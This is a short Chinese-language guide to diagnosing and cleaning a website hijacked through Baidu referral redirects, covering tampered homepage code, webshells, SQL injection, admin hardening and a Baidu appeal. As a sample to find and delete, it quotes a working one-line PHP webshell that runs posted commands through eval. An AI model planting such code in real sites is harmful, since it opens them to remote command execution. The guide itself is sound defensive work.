一、问题现象与原因分析
-
现象描述
- 从百度点击进入网站时,跳转到非法页面。
- 直接输入网址访问则正常,未发生跳转。
- 百度快照显示非法内容,site查看网站收录出现大量非法关键词。
- 百度网址安全中心提示“该页面可能存在钓鱼欺诈信息”。
-
原因分析
- 首页代码被篡改:黑客在首页文件中添加了Unicode编码的非法内容,吸引百度蜘蛛抓取。
- 木马后门植入:网站被植入木马(如webshell),导致持续被篡改。
- SQL注入漏洞:黑客利用SQL注入漏洞获取管理员权限,篡改网站内容。
二、排查与修复步骤
-
检查首页代码
- 查看首页文件(如index.html),检查标题、描述和内容是否被篡改。
- 示例:
- 清除所有Unicode编码的非法内容。
-
查找木马与后门
- 使用安全工具扫描网站文件,查找可疑的木马文件或后门程序。
- 重点关注以下文件类型:
.php、.asp、.js、.htaccess。 - 示例:
<?php eval($_POST['cmd']); ?> - 删除所有木马文件,确保网站安全。
-
修复SQL注入漏洞
- 检查漏洞文件(如search.php),修复SQL注入漏洞。
- 采用以下措施:
- 过滤URL请求中的非法特殊字符。
- 使用数据库语句预编译和绑定变量。
- 检查变量值的类型和数据格式,限制提交参数的长度。
-
加强后台管理
- 更改默认的后台管理地址(如admin),设置复杂路径。
- 使用强密码(数字+大小写字母+特殊符号,至少10位以上)。
-
提交百度申诉
- 清除恶意代码并修复漏洞后,登录百度搜索资源平台,提交网站申诉。
- 提供修复证明(如清理记录、安全检测报告),申请解除风险提示。
